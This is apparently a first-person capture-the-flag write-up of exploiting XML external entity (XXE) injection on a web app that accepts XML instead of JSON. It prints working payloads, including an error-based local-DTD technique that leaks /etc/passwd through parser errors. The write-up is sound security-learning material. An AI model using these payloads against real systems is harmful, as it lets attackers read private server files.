A website is presented, where you can choose from a list of options. When changing the options, a request is sent to the backend server which will give you a reply. One of the options is XXE, which will tell you that you cannot do XXE on JSON.
Inspecting the source of the website, it is shown that it encodes using JSON to communicate with the backend, which includes setting Content-Type: application/json
, with a format of {"message": "Cola"}
.
Instead it can be set to Content-Type: application/xml
, <message>Cola</message>
.
Knowing this, I tried to do basic XXE, by reading a file and just throwing it in instead of using Cola
, which in hindsight does not make any sense.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<message>&xxe;</message>
Which will give you some error saying What are you doing?
, or something like that.
Changing &xxe;
to ie. &unknown;
, it will display a parsing error that the variable does not exists.
That immediately lead me to try getting it to use the value from xxe
, as a variable name, so that it would give me the content of /etc/passwd
, as a error message.
Reading a little more, I could see that I could do what I wanted somehow with local dtd
, which would give me a error with the content of the file.
I then ended up with the following (somewhat).
<!DOCTYPE root [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
<root></root>
Which gave me the content of the file, and from there on out I needed to find the flag. Which was in root /root
.
I also tried to send a request to my own webserver on my kali machine, + including a remote dtd file, but nothing worked.